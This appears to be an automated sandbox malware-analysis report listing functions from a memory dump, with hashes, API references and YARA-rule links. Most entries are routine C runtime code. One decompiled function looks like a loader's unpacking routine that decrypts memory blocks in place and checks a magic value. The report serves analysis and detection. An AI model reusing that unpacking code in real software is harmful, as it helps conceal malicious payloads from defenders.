Opcode ID: 224c859db73a9e7990504f3a788f239645654250f3c118f8d2cccf15b826371b
Instruction ID: 82fc6aaa63711f39969082ff4d791366afad50befdd7dc3878c9ab6c5f535116
Opcode Fuzzy Hash: 224c859db73a9e7990504f3a788f239645654250f3c118f8d2cccf15b826371b
Instruction Fuzzy Hash: A601C4399046199FCF05DBE8D9146FD777DAF84714F644809E911AB2C4CF309AC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDD12, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1DDD2A

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF,?,?,?,6E1E9B2C), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DDD3C
_free.LIBCMT ref: 6E1DDD4E
_free.LIBCMT ref: 6E1DDD60
_free.LIBCMT ref: 6E1DDD72

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8cdf278fa9146b08bb84b77cb0327afae93c9551589190da8098d6a27d5bb4bc
Instruction ID: 9496aee8cb1fd4ab3e44c68319b0141d2c9896f2e2630b6e60353b4c28a19e52
Opcode Fuzzy Hash: 8cdf278fa9146b08bb84b77cb0327afae93c9551589190da8098d6a27d5bb4bc
Instruction Fuzzy Hash: 2BF06232608E099B8E54CAE4E4C5DDA33EEBA113103750D0AF158D7940DB30F9C8DEA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F3D8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19F3DF

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E1981D0
Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E1981ED
Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E19820A

_Mpunct.LIBCPMT ref: 6E19F46C
_Mpunct.LIBCPMT ref: 6E19F486

Strings

$+xv, xrefs: 6E19F491

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Maklocstr$Mpunct$H_prolog3_strlen
String ID: $+xv
API String ID: 1929215243-1686923651
Opcode ID: f3e08906d9f5a333d795c6ddfb7f102dbab762792644383e79e2091ef75bf78a
Instruction ID: 7762cba599378717141c81ca1288b07ae151f9c16d7a46fefb227b686c7ecf9e
Opcode Fuzzy Hash: f3e08906d9f5a333d795c6ddfb7f102dbab762792644383e79e2091ef75bf78a
Instruction Fuzzy Hash: 1121B5B1504B526ED721CFB584907BBBEFCAB0C604B14491AE499C7E41D734DA81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7184, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A718B

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

_Mpunct.LIBCPMT ref: 6E1A7218
_Mpunct.LIBCPMT ref: 6E1A7232

Strings

$+xv, xrefs: 6E1A723D

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mpunct$H_prolog3_strlen
String ID: $+xv
API String ID: 23384044-1686923651
Opcode ID: aa9e649425a58c0a57a4fe74cd2f5f2430b8336f843c83e7f2e0670f388d84b1
Instruction ID: ab0e2211fa93b92030320733f6efe4bec671a74c67537443082e05e77e046dd2
Opcode Fuzzy Hash: aa9e649425a58c0a57a4fe74cd2f5f2430b8336f843c83e7f2e0670f388d84b1
Instruction Fuzzy Hash: 342195B5904B926ED721CFB888507BBBEFCBB09614F04091EE599C7A41D734DA81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1618F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1618F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6e164130;
				_t39 = E6E161F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4);
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6e16414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6e1651a7; // 0x6e1651a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6E1618C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6e16414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000);
					}
				}
				return _v16;
			}

APIs

VirtualAlloc.KERNEL32(00000000,6E16167D,00003000,00000004,?,?,6E16167D,00000000), ref: 6E16194A
memcpy.NTDLL(?,?,6E16167D,?,?,6E16167D,00000000), ref: 6E1619DC
VirtualFree.KERNEL32(?,00000000,00008000,?,?,6E16167D,00000000), ref: 6E1619F7

Strings

Mar 9 2021, xrefs: 6E16197C

Memory Dump Source

Source File: 00000006.00000002.521506374.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000006.00000002.521496666.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521512708.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521521840.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.521526623.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 9 2021
API String ID: 4010158826-2159264323
Opcode ID: 26b68c8339297d9a2adff27b84c0e05aece165c858a211e78fbea5d70f074c14
Instruction ID: 267cd5e4a300fb3f3d2e9d20317fd6f4d00943e60fe420ae920737fc0fbadb25
Opcode Fuzzy Hash: 26b68c8339297d9a2adff27b84c0e05aece165c858a211e78fbea5d70f074c14
Instruction Fuzzy Hash: 39316171E001199FDF01CFD9C880AEEBBB9BF49308F108169E909B7244D771AA5ADB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F56E, Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E19F575
_Maklocstr.LIBCPMT ref: 6E19F5DE
_Maklocstr.LIBCPMT ref: 6E19F5F0
_Getvals.LIBCPMT ref: 6E19F63A

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Maklocstr$GetvalsH_prolog3_
String ID:
API String ID: 1611767717-0
Opcode ID: 129d6dbe499302fbca377b4abd9b2fee7682162ce2771b5afd434ce34f488d88
Instruction ID: 47f7dcdf1c6d2c9f557ca67a5ae65031e22c6c65bbda4d0e5ee8ecdab874262a
Opcode Fuzzy Hash: 129d6dbe499302fbca377b4abd9b2fee7682162ce2771b5afd434ce34f488d88
Instruction Fuzzy Hash: DC2191B2D00214ABDF04DFE5D884ADF7BACAF05714F008816B9199F141DB7095C4EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4166, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb97407b0a3c34f8414789003f61b9c491fa70fb217c4229f8d5b9c1350e6c3
Instruction ID: 34f62d6f2db5b71fbb03b47f6797b5c380bd8d9d2bb90131f4fbf084fc5808dd
Opcode Fuzzy Hash: 4fb97407b0a3c34f8414789003f61b9c491fa70fb217c4229f8d5b9c1350e6c3
Instruction Fuzzy Hash: 4921EB36A45622EBDB1187E5AC44B0E3BA89F26760F214610FD21F7280D730FD86A5E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF749, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000,00000000,00000001), ref: 6E1CF74E
_free.LIBCMT ref: 6E1CF7AB
_free.LIBCMT ref: 6E1CF7E1
SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000), ref: 6E1CF7EC

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 51129c13d82fc3441873a7fa2150da98bab4be838e2bb544559a7061642b2cf7
Instruction ID: 12a7eee53643361033cab14ec1fad328ea87e105dae03532860ea1aac3c101af
Opcode Fuzzy Hash: 51129c13d82fc3441873a7fa2150da98bab4be838e2bb544559a7061642b2cf7
Instruction Fuzzy Hash: 09110A33214A012F9A415FF84CC4DAA25AEABF6A797350625F334C25C0DF2588CAB122

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF8A0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E1C23F9,6E1D1C0A,?,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2), ref: 6E1CF8A5
_free.LIBCMT ref: 6E1CF902
_free.LIBCMT ref: 6E1CF938
SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,?,6E1C23F9,6E1D1C0A,?,?,6E1C1383,?,?,?,6E1AADF4,?), ref: 6E1CF943

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 27e05a923c39c4735fa8084b64ea5dba26d5b3003972ee2a1ebbb711c113f8e6
Instruction ID: 165bf86af381295ff886f847db01daa110407d2c9303d727f47f51b3eac91406
Opcode Fuzzy Hash: 27e05a923c39c4735fa8084b64ea5dba26d5b3003972ee2a1ebbb711c113f8e6
Instruction Fuzzy Hash: CA11C6332049012B9A005EF94C85E9A25AFABF6B797350625F335C21C0DF258DC9B123

Uniqueness

Uniqueness Score: -1.00%

Function 6E182211, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182218
std::_Lockit::_Lockit.LIBCPMT ref: 6E182223
std::_Facet_Register.LIBCPMT ref: 6E182273
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182293

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 2d186118f79500d6c0ccb073e1e99d7d7120e4f57ddbc2fcd7d7bf60e64ec0ca
Instruction ID: a1c5c04b8f7cacb13ccf52ad92906ac4f23d7afc9012219eb88af9d8b177d68d
Opcode Fuzzy Hash: 2d186118f79500d6c0ccb073e1e99d7d7120e4f57ddbc2fcd7d7bf60e64ec0ca
Instruction Fuzzy Hash: AC112B71900626DFCB06CFF898500EEBB797F45314B24094AE421EB290DB308AC5EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1826F0, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1826F7
std::_Lockit::_Lockit.LIBCPMT ref: 6E182702
std::_Facet_Register.LIBCPMT ref: 6E182752
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182772

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 8725fd3e5cb2e64060704fddadf65440bd83fd04f85b4b2537c27832e9c83271
Instruction ID: 95efa4473a0e03fdf37a2baab2f2eb4755bf8ab7ec64fe845c331970b74d54b9
Opcode Fuzzy Hash: 8725fd3e5cb2e64060704fddadf65440bd83fd04f85b4b2537c27832e9c83271
Instruction Fuzzy Hash: 00110275D0062ADBCF06DFE8C8508EEBB797F55314B204A49E465EB290DB308AC8EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E182379, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182380
std::_Lockit::_Lockit.LIBCPMT ref: 6E18238B
std::_Facet_Register.LIBCPMT ref: 6E1823DB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1823FB

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 3fe93a5a3c6803f8778b7bb66105910e172dfd44193fdbb80e95106a458568f3
Instruction ID: f57d229806c838259bed4717528a27fa39c4b0a212f0c76f997c151b2c6e0699
Opcode Fuzzy Hash: 3fe93a5a3c6803f8778b7bb66105910e172dfd44193fdbb80e95106a458568f3
Instruction Fuzzy Hash: DD11C67190062ADBCB06CFE8C8504EE7779BF49314B204959E525EB280DB308AC5EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E182A2B, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182A32
std::_Lockit::_Lockit.LIBCPMT ref: 6E182A3D
std::_Facet_Register.LIBCPMT ref: 6E182A8D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182AAD

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: e33d7cf581341ba6f16272479ec1ece33608068ea23a7118e59b6c63948b417f
Instruction ID: 2e6e07aba4ac90b499b5bd709a74e824e41124fdd0be9dea2a1e020004dbd3df
Opcode Fuzzy Hash: e33d7cf581341ba6f16272479ec1ece33608068ea23a7118e59b6c63948b417f
Instruction Fuzzy Hash: C711A57590062ADBCB16DFE8C8505EEB77A7F44714B204A49D426EB2C0DB308A85EF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1813A3, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1813AA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1813B5
std::_Facet_Register.LIBCPMT ref: 6E181405
std::_Lockit::~_Lockit.LIBCPMT ref: 6E181425

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: d008da9c2ac84d7be36e1dd0538b917fbd1b8236dfed9b1645d9b4391db640ad
Instruction ID: c8bd9356940136bb753bf213a0bbd8adf3925c21c72c38f7fddb34a99ad4d216
Opcode Fuzzy Hash: d008da9c2ac84d7be36e1dd0538b917fbd1b8236dfed9b1645d9b4391db640ad
Instruction Fuzzy Hash: 1B11A975A0052ADBCB06DFE8C8504EEB7797F55314B204959D435EB2C0DB308A85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1996F2, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1996F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E199703
std::_Facet_Register.LIBCPMT ref: 6E199754
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199774

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 877734a03986d83d4ff066b6a3a165c649bc72a94f14c0432a0d71548515c9b2
Instruction ID: 5eaafbe0e6773fc60773ce2e47ac1865559b0f17b2273c51aa940c37ddae0ee0
Opcode Fuzzy Hash: 877734a03986d83d4ff066b6a3a165c649bc72a94f14c0432a0d71548515c9b2
Instruction Fuzzy Hash: 6A019639A005199FCF09DFE4D964AFD7779AF84314F244919E811AB280DF3099C5FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199787, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19978E
std::_Lockit::_Lockit.LIBCPMT ref: 6E199798
std::_Facet_Register.LIBCPMT ref: 6E1997E9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199809

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: a95f868e469e200756e2ffb4bf2322053a8401e79a2ee8471038565a502dc6b2
Instruction ID: a75e34a17e5cfc73609fdb867ac19346fc9ac67af12394ad954cd6a7c5acaf49
Opcode Fuzzy Hash: a95f868e469e200756e2ffb4bf2322053a8401e79a2ee8471038565a502dc6b2
Instruction Fuzzy Hash: 4A01D275A005198FCF05DBE4C924AFE77BAAF84314F244919E811AB280DF349EC4FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198FF6, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198FFD
std::_Lockit::_Lockit.LIBCPMT ref: 6E199007
std::_Facet_Register.LIBCPMT ref: 6E199058
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199078

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 1d26886deaccdfebbd2c2365776b57d9338d013e6650ba0f85663db1c1821abf
Instruction ID: 6243579b6b5e705e895e802f865cb29328ee66af3bf37011419314ccd3b0cbf8
Opcode Fuzzy Hash: 1d26886deaccdfebbd2c2365776b57d9338d013e6650ba0f85663db1c1821abf
Instruction Fuzzy Hash: D901C435A001159FCF05DBE4C824AFE77BEAF84364F244809E825AB280CF719AC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19949E, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1994A5
std::_Lockit::_Lockit.LIBCPMT ref: 6E1994AF
std::_Facet_Register.LIBCPMT ref: 6E199500
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199520

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: cb722b6cb04ff2b06c0e4814df9545a9668094df28cfe650eedafbb6f33f982d
Instruction ID: 304965b77cae73b617bea79dc6c20b48b8e1b8d94871399632200c9b0c65a8d4
Opcode Fuzzy Hash: cb722b6cb04ff2b06c0e4814df9545a9668094df28cfe650eedafbb6f33f982d
Instruction Fuzzy Hash: 9E0184B59005199FCF05DBE4D864AFE7779BF84314F244909E821AB290CF709AC9FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1934F1, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1934F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E193502
std::_Facet_Register.LIBCPMT ref: 6E193553
std::_Lockit::~_Lockit.LIBCPMT ref: 6E193573

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 3a863901b8af4844ef48b38e63619f91cc5f1a40bcd2857331252ab786392432
Instruction ID: 26f09a5d5d68d31964b39b6bd944dfd069fc936176d831c07e34d94b45f09b13
Opcode Fuzzy Hash: 3a863901b8af4844ef48b38e63619f91cc5f1a40bcd2857331252ab786392432
Instruction Fuzzy Hash: 43018479A00519DFCB06DBE4D8546EE77B9AF84314F244849E815AB280DF30DAC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5D1E, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5D25
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5D2F
std::_Facet_Register.LIBCPMT ref: 6E1A5D80
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5DA0

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: ae27061f720aea50b52b8369a5dc8e2edd3a299db1e76edbf723398041ab02a3
Instruction ID: a98182c47b4f44d21e2c1cbe93dd102e3b1d75bfc74c289e3b05ad0105120b69
Opcode Fuzzy Hash: ae27061f720aea50b52b8369a5dc8e2edd3a299db1e76edbf723398041ab02a3
Instruction Fuzzy Hash: FA01C439A00119DBCF05DBE8C814AFE777ABFC4318F244909E921AB280DF3099C5EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E199533, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19953A
std::_Lockit::_Lockit.LIBCPMT ref: 6E199544
std::_Facet_Register.LIBCPMT ref: 6E199595
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1995B5

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 8ff7d9cea170cbf3ccc78cb67769b0acca7f680325abbb762f44c2ecb788e5e4
Instruction ID: 84dfd3b6f4dfdbcf1ccb9d8ddfb0604cea7001353bbad243d6fce4a185ca67e2
Opcode Fuzzy Hash: 8ff7d9cea170cbf3ccc78cb67769b0acca7f680325abbb762f44c2ecb788e5e4
Instruction Fuzzy Hash: 6401C475A001199FCB05DBE4D824AFE7779AF84314F244909E812AB280CF30DEC8FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E193586, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19358D
std::_Lockit::_Lockit.LIBCPMT ref: 6E193597
std::_Facet_Register.LIBCPMT ref: 6E1935E8
std::_Lockit::~_Lockit.LIBCPMT ref: 6E193608

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: ab34e9eb4f6c69666b0d1240756a100592af934a92039232aaf5d9724c346400
Instruction ID: 5dc0ecf0093aa5c2fd7aaa294e1ccc9ff0ecd5257c13098035591ba67b102a6f
Opcode Fuzzy Hash: ab34e9eb4f6c69666b0d1240756a100592af934a92039232aaf5d9724c346400
Instruction Fuzzy Hash: 9501C8359005159BCB05DBE4C8146FD777ABF84314F254949D525AB280DF309AC5F751

Uniqueness

Uniqueness Score: -1.00%

Function 6E1995C8, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1995CF
std::_Lockit::_Lockit.LIBCPMT ref: 6E1995D9
std::_Facet_Register.LIBCPMT ref: 6E19962A
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19964A

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: c13d0b772b5351ca802f9d75129846a07238eddc0dcf35bc313cb676ada1b494
Instruction ID: fd1e8ffaef74a995377b76ec1c2cf678ee96b9ef2237b59f72e05b6be5e3bb92
Opcode Fuzzy Hash: c13d0b772b5351ca802f9d75129846a07238eddc0dcf35bc313cb676ada1b494
Instruction Fuzzy Hash: 6701C035A001198FCF05DBE4C864AFE77BEAF84314F240809E825AB290CF319AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5ACA, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5AD1
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5ADB
std::_Facet_Register.LIBCPMT ref: 6E1A5B2C
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5B4C

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: ef125bf1e9f00c75a0b29e15798e80a4e5338f4a7b0ae56c35c5ac3c05cb9683
Instruction ID: 7309d9075ccbe0192cc3475ae642f733b615cd0d104a48ee4987bd0c9e5fc04a
Opcode Fuzzy Hash: ef125bf1e9f00c75a0b29e15798e80a4e5338f4a7b0ae56c35c5ac3c05cb9683
Instruction Fuzzy Hash: 3B01C479900119CFCF05DBE8D910AFDBB7ABF84314F244809E921AB280CF309AC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5B5F, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5B66
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5B70
std::_Facet_Register.LIBCPMT ref: 6E1A5BC1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5BE1

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 447178fca4eada814e2e57e2b567011ab9a78c8db3e19095e1d24b05ecb32ec9
Instruction ID: f784c16ac2074349849e473471499696e2d9237f722dcf791dedc2107dfd37d2
Opcode Fuzzy Hash: 447178fca4eada814e2e57e2b567011ab9a78c8db3e19095e1d24b05ecb32ec9
Instruction Fuzzy Hash: F601C4799041198BCF05DBE8C914AFD77BABFC4314F240819E911AB280CF3099C8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19981C, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199823
std::_Lockit::_Lockit.LIBCPMT ref: 6E19982D
std::_Facet_Register.LIBCPMT ref: 6E19987E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19989E

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 9e49cac7386bf5329d0d93d8699a96d9403be2861f98b0bfdfdc0e04b17f6300
Instruction ID: 0ded393684258bff0ee14c6c5065d736be4c36119b1e92fdd071213cbea4ab64
